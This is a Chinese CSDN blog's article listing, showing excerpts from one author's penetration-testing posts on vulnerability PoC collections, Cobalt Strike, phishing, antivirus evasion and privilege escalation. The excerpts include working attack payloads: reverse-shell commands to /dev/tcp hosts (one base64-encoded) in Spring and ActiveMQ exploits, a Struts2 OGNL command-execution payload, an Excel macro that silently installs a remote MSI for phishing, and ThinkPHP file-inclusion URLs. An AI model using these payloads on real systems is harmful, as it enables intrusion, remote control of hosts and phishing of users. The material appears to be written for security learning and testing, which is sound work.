!QK-CSDN博客

原创渗透测试小技巧

设置两个会话，就是同时登陆两个数据库，第一个Select GET_LOCK('a',10);4）三者的关系，Rumtime封装了ProcessBuilder的方法，ProcessBuilder封装了ProcessImpl的方法。benchmark（count,expr），count代表执行次数，expr代表执行的语句。1）@是用户变量，select @user from users;2）@@是系统变量，select @@database;3）漏洞攻击（系统漏洞，其他web漏洞，数据库漏洞等等）

2024-03-26 21:02:47 305

原创渗透测试-网络攻防面试题（非常全面，根据自己经验所写，长期更新）

10）mssql，orcale的一些特定函数和闭合方法---------------------------------------------------------------no------------------------------------------------------1）脏牛内核提权----------------------------------------------no----------------------------------------------

2024-01-03 11:18:05 1220

原创 ElasticSearch漏洞合集及其POC合集

2.ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427）5.Elasticsearch写入webshell漏洞（WooYun-2015-110216）3.ElasticSearch 目录穿越漏洞（CVE-2015-3337）4.ElasticSearch 目录穿越漏洞（CVE-2015-5531）3）漏洞版本:

2023-08-21 11:27:48 503

原创 spring漏洞合集及其poc合集

在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub。1）漏洞原理：Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地开发REST风格的Web服务。

2023-08-21 11:26:41 489

原创 log4j反序列化远程命令执行以及个人原理理解

目录服务是一个特殊的数据库，用来保存描述性的、基于属性的详细信息，支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数，发送到log4j，打印到日志中，开始解析{}中的内容，发现是ldap实现的jndi，然后调用lookup。功能去查找x.x.x.x/test.class该文件，然后发现是远程服务器的文件，需要通过codebase去下载该class类，然后下载后，对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。

2023-08-11 10:08:19 314

原创 struct2（S2）漏洞poc合集以及对应版本

{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}（后有一个换行符）在放置参数的过程中会将参数进行OGNL渲染，造成任意命令执行漏洞。

2023-08-11 10:06:29 579

原创 fastjson漏洞合集以及是否使用组件判断

3>使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个rmi或者ladp服务。则会发现rmi服务会有回显，而且shell会反弹回来。6>则会发现rmi服务会有回显，而且shell会反弹回来。（3）通过dnslog来判断是否使用了fastjson。2>将class文件放到http服务目录下。（2）查看其fastjson的版本。（1）漏洞版本：1.2.24之前。（1）漏洞版本：1.2.48以前。2）开启监听2233端口。1）写一个java文件。3）开启一个rmi服务。

2023-08-11 10:05:05 672

原创 sqlmap的高级使用-tamper脚本使用、os-shell原理等

（10）concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。（5）between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=（14）ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。

2023-07-11 16:54:30 703

原创 nmap的高级使用-参数，脚本，绕过防火墙

-script http-methods --script-args http.useragent=”Mozilla 5” 修改user-agent字段。--script-trace --script=vuln/.... 来查看发送的数据包。--script=http-methods 扫描http允许的方法。--script-help=dos 查看dos脚本的帮助文档。--script=http-brute http认证爆破。--script=http-ls 扫描http目录。

2023-07-11 16:53:33 721

原创 tomcat简单漏洞合集

漏洞原理：开启了put方法，且readonly初始化参数由默认值设置为false。1.tomcat的put方法任意文件伤处(CVE-2017-12615)2.tomcat的apj文件包含漏洞（CVE-2020-1938）漏洞版本：7.0.0-7.0.79。

2023-07-03 08:42:47 217

原创海康威视漏洞合集

解密脚本地址：https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧：/api/video/v2/cameras/previewURLs，访问是否返回rtsp数据流地址，若返回，访问就是摄像头。poc检测工具地址：https://github.com/sccmdaveli/hikvision-poc。漏洞版本：大多数设备。

2023-07-03 08:41:03 4111

原创 Postgresql漏洞合集

需要超级管理员数据库用户（postgres）才可以，因为在9.3版本之后，默认得开启了COPY TO/FROM PROGRAM功能，可以让超级用户去执行任意系统命令。2.PostgreSQL 高权限命令执行漏洞（CVE-2019-9193）1.PostgreSQL 提权漏洞（CVE-2018-1058）漏洞版本：9.3-11.2。漏洞版本：9.3-10。

2023-07-03 08:39:45 785

原创 php、php-dev、php-cgi、php-imap、php-fpm、xxe漏洞合集

执行命令python fpm.py 127.0.0.1 /usr/local/lib/php/PEAR.php -c '

2023-07-02 13:55:31 142

原创 phpmyadmin漏洞合集

../，比如在cmd命令行中，cd 到一个不存在的目录，会报错，在对传参的参数进行过滤时，需要过滤代码，但是传参点很多，需要多次输入过滤代码，开发人员考虑到使用将过滤代码写入过滤文件，通过include包含该文件，来达到一个过滤的目的，假如这个包含的文件是可以控制的，那么就可能导致文件包含，该漏洞中，主要是因为对于传参包含文件的参数过滤时，只是对其内容进行检测白名单验证，只要target参数是白名单中的。但是如果在其后加一个/../，系统会默认认为还是在当前目录，就不会对错误目录进行检查，也就不会报错；

2023-07-02 13:55:29 523

原创 apache httpd漏洞合集

就是上传文件，在1.php文件名后面加一个0x0ahex值进行一个绕过，恰好有解析漏洞，将1.php%0a当做1.php执行。--#exec cmd="id" -->，直接访问，就会显示。3.Apache HTTP Server路径穿越漏洞(CVE-2021-41773、CVE-2021-42013)上传文件，bp抓包修改为123.php.jpg，访问其路径，会以php格式执行。漏洞版本：Apache HTTP Server 2.4.49-2.4.50。漏洞版本：通用，得看是否开启了ssi组件。

2023-07-02 13:54:20 532

原创 activemq漏洞合集

{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616。http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径。上传显示204，成功，但是该路径下没有解析权限，所以需要使用MOVE方法进行移动到正常的物理路径。弱口令：admin/admin/

2023-07-02 13:52:30 603

原创 solr漏洞合集

在根据名字构造链接，进行访问，post传参：(验证是否存在漏洞poc)在根据名字构造链接，进行访问，post传参：(验证是否存在漏洞poc)漏洞版本：Apache Solr 5.0.0 ~8.3.1。漏洞版本：Apache Solr < 8.2.0。3.solr远程代码执行（CVE-2017-12629）5.solr的XXE漏洞（CVE-2017-12629）2.solr远程代码执行（CVE-2019-0193）漏洞版本：Apache Solr < 7.1。漏洞版本：Apache Solr < 7.1。

2023-07-02 13:51:51 822

原创 flink漏洞合集

1.apache flink文件上传漏洞(CVE-2020-17518)-------未复现出来。漏洞版本：Apache Flink 1.5.1 ~ 1.11.2。漏洞版本：Apache Flink 1.11.0-1.11.2。2.apache flink目录遍历(CVE-2020-17519)

2023-07-02 13:51:19 337

原创 jboss漏洞合集

poc：http://192.168.88.130:8080/jbossmq-httpil/HTTPServerILServlet 若出现This is the JBossMQ HTTP-IL则表示有漏洞。3.JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504）2.JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）操作技巧：类似于JBoss 5.x/6.x 反序列化漏洞。漏洞版本：JBoss AS 4.x及之前版本。漏洞版本：5.x/6.x。

2023-07-02 13:50:46 103

原创 thinkphp漏洞合集

post请求-http://192.168.80.129:8080/index.php?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件。s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件。漏洞版本：ThinkPHP < 5.1.23。漏洞版本：5.1.x 5.0.x。

2023-07-02 13:48:54 201

原创 ms17-010-永恒之蓝漏洞

永恒之蓝漏洞通过 TCP 的445和139端口，来利用 SMBv1 和 NBT 中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网，即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。使用msf搜索ms17-010，选则scanner模块来判断是否有该漏洞，然后利用ms17_010_eternalblue模块来进行攻击。

2023-07-02 13:48:16 53

原创 openssl-心脏滴血漏洞

但假如A发了一个实际长度只有100字节的数据包，但是报文数值标明了是60000，当这个包发送到B，B就会返回相应包，除了在内存中复制出原来A请求包的100字。该问题出现在openssl协议中的传输层安全，主要的原理是A向B发送一个数据包，数据包中除了有实际的头部信息内容等，还有标明了报文长度的数值，这个数。节，还会多余的复制出59000字节的内存数据，假如该数据中有敏感数据的话，这就导致了信息泄露。据包发送到B时，B只是傻傻的接收数据包，并返回一个包含A请求包的响应包。

2023-07-02 13:47:28 205

原创内网渗透攻防-cobalt strike全部功能使用2

然后复制到要攻击的目标机器上：shell copy C:\\windows\123.exe（以控制机器-上传上的地址） \\database（目标机器域内名称）\C$\\windows\1.exe（目标机器-想要传到的地址）比如拿下了内网机器，是双网卡，既通外网，也通内网，就可以使用代理，右键点击中转，选择listener选项，payload选择tcp，listenhost填写双网卡的内网地址，端口是跳板机器的端口，会话选择这个跳板机的会话。krbtgt的hash密码-通过minikatz来获取。

2023-06-30 14:32:56 289

原创内网渗透-cobalt strike全部功能使用1

使用dns的powershell执行命令，接收到之后，执行checkin命令（作用是强制让被控端进行一次回连）作用：利用一个公共域名主机当做cs服务器，解决不在同一局域网的连接机器无法连接的问题，也可以防止其中一台机器。屏幕截图，键盘记录，进程处理，端口扫描，用户发现，文件管理，远程vnc，浏览器代理（仅支持IE）dns的木马隐蔽性更好。走53端口，不会被拦截，就是时间响应慢。是指拿下主机后，对主机执行的一系列操作。的网页代码无法被访问，导致机器下线。beacon类似于cmd和shell。

2023-06-30 14:31:59 85

原创网络安全之内外网渗透-网络钓鱼技巧

操作：先使用msf生成一个msi文件，放到云服务器上，然后新建一个excle表，右键点击插入宏表，然后第一格输入=EXEC（“msiexec /q /i http://192.168.10.88/123.msi”），第二格输入=HALT()入cs生成的代码，选择auto open选项，然后保存，弹出的框选择否，然后会出现另存为，选择dotm启用宏的文件，在通过邮件发。利用生成的宏代码，放到word中，记得word一定要开启开发者模式，在开发者模式中选择宏，取名，编辑，在编辑弹出的框中加。

2023-06-30 14:30:35 217

原创网络攻防渗透之内网隧道

不到shell框，然后在外网服务器添加一条端口转发规则，将kali的msf监听端口映射到本机上shell会话的端口，这样，当shell弹回。先生成msf木马，lhost是外网服务器的地址，在内网服务器上运行木马后，会有一个会话到外网服务器，只是没有监听该端口，看。作用：比如我们用kali进行攻击，拿到外网服务器权限后，无法从kali直接去访问内网机器的服务，这时候利用端口转发映射的方法，外网服务器上线后，在会话基础上生成一个监听器，然后利用该监听器生成木马，到内网服务器上执行，则内网服务器会反向连。

2023-06-30 14:26:20 138

原创网络安全攻防之免杀基础

使用c# xor的shellcode加载器进行免杀，类似于上两个（配合cs）--项目地址：http://github.com/antmanlp/ShellCodeRunner。例如cs生成一个py文件格式的文件，将其中的代码放到shellcode加载文件中，然后用pyinstaller生成一个exe文件，实现免杀。1）替换敏感字符（切记要全部替换，不只是源码，还有文件名等，例如sqlmap太敏感，全部替换成qiao）6）把头部信息删掉（用字符拼起来的sqlmap）5）把帮助源码删掉（help）

2023-06-30 14:25:07 112

原创 redis攻防-ssh登录、主从复制、未授权访问、计划任务、写webshell

cat key.txt | redis-cli -h 192.168.214.138 --pass（有密码则加，没密码不用） 123456 -x set wang。原理是：利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下，然后直接利用ssh的私钥连接即可。主从模式，一个redis机器充当主机，可以进行写数据操作，其他的redis机器充当从机，只可以进行读操作。查看数据库中的内容：keys * （redis数据库没有表，是大量的键值对组成的）3）开启保护模式（protect-mode）

2023-06-30 14:24:15 641

原创网络攻击之应急响应

（6）logontracer （阿里云服务器安装neo4j）-windows。360星图,蓝队工具-splunk，elk。1）mysql：小公司小网站使用的，可以用河马查杀工具，hkkvjuvffo工具。userassisview，文件使用记录。apache的logs/②windows上的系统日志。③linux上的系统日志。（1）先知社区的应急响应大合集。（2）火绒剑-windows。4.追查：（根据表现选择最佳方法）Ⅰ.日志分析（最主要的）Ⅳ. 脚本软件分析。

2023-06-30 14:22:52 57

原创网络攻防hvv-红蓝对抗

4.权限维持-不死木马(就是进程一直都在运行，不会被任务管理器杀掉，因为一直在运行，所以无法删除)php的不死函数：ignore_user_abort(true)第二种：CTF对抗，也分为两个队，但是每个队伍都有蓝队和红队。第一种：护网，分为两个队，红队（纯攻击）和蓝队（纯防御）在一开始开启waf（有上传就删除）Ⅳ.漏洞利用率（poc/exp）可以用来检测ip，域名，文件等等。Ⅲ.脚本工具（扫描探针等等）红队攻击方法，可以学习。9.微步情报和奇安信威胁平台。

2023-06-30 14:22:41 542

原创网络安全攻防渗透测试之python开发

xpath爬虫爬取网页信息，筛选，http头部，保存数据到文件中，结合漏洞检测使用。Ⅲ.pocsuit引入poc/exp脚本：（漏扫框架二次开发）根据socket请求返回值来判断端口是否开放。用nslookup+域名来判断是否有cdn。二次开发，修改脚本-根据输入的参数对应文件和函数。利用字典循环，抛出异常，利用ping。普通request请求加上poc测试请求。使用第三方库nmap。使用第三方库nmap。使用第三方库nmap。③启动对应ID的扫描任务。④获取对应ID的扫描状态。

2023-06-30 14:21:40 494

原创网络攻防之内网安全横向渗透权限提升

schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器：nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)（攻击机）：./ptunnel -p ip地址（外网机器） -lp 端口（本地端口） -da ip地址（目标。redesktop 127.0.0.1 端口（本地端口）

2023-06-30 14:19:29 716

原创 docker基本使用及其命令

（5）端口映射：docker run -tid -p 8080:80 -p3309:3306 -v e:\:/var/www/html --name web 下载下来的镜像名 /bin/bash。docker commit -m="first commit" -a="qiao" web（现在运行镜像的名字） docker账户名称 (-a表示创作者，-m表示说明文字)其中-t为创建一个容器，-i为可以交互，-p是端口映射本机的8080端口映射到docker容器的80端口，-v是目录映射将本机的e:\映。

2023-06-03 16:48:14 43

原创各种shell反弹方法

s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式，ip=？2.使用nc进行反弹shell。6.使用php反弹shell。

2023-05-16 11:14:39 2583 1

原创白盒测试-代码审计

文件上传--找头像上传，move_up_upload_file函数等。常用审计思路，利用idea，中的全局搜索：ctrl+shift+F，引用追踪：alt+f7或查找引用。看指向：外部和內部，自主编写的过滤器在內部项目库中，框架的过滤器在外部项目库。③规则写法（引用内置过滤）-很安全-通过查找框架版本人们发布的poc，测试。Ⅱ.java开发框架：（找漏洞的方式就是找过滤器，绕过）①Shiro:配置文件-web.xml或者pom.xml。②Maven:配置文件-web.xml或者pom.xml。

2023-03-13 19:32:26 369

原创渗透测试-权限提升

比如：C://program files/a.exe -f，windows识别到空格，认为后面是参数，正确的应该是”C://program files/a.exe“ -f。命令问题：利用tar压缩，文件名改为--参数类型，从而执行，利用定时任务，和SUID（其他命令也可，换文件名-参数）先获得webshell，然后进行上传一些文件，进行测试提权（msf或者手动的EXP），然后创建用户，开启端口，远程连接。假如在C：//加一个program恶意文件exe后缀，再次执行，则该恶意文件会被执行。

2023-03-13 19:31:29 458

原创渗透防火墙绕过

隔两三秒），还可以通过修改请求包的user-agent为百度，360等搜索引擎的信息，从而伪造成搜索引擎在爬取网页，从而不会造成拦。Ⅰ.当利用工具进行扫描时，比如扫描路径，对方开启了wafCC流量检测，则返回的结果会产生误报，可以通过延时扫描来绕过（每次扫描间。还可以利用Xray和awvs，bp联合起来，bp当中转，xray当主要扫描工具，awvs当绕过方式（降低速度，请求头爬虫引擎）②自写轮子：自己抓菜刀蚁剑的读取文件，执行命令的数据包，进行解密，然后自己进行修改，达到目的，进行在网页上的操作，

2023-03-13 19:29:42 800

空空如也

空空如也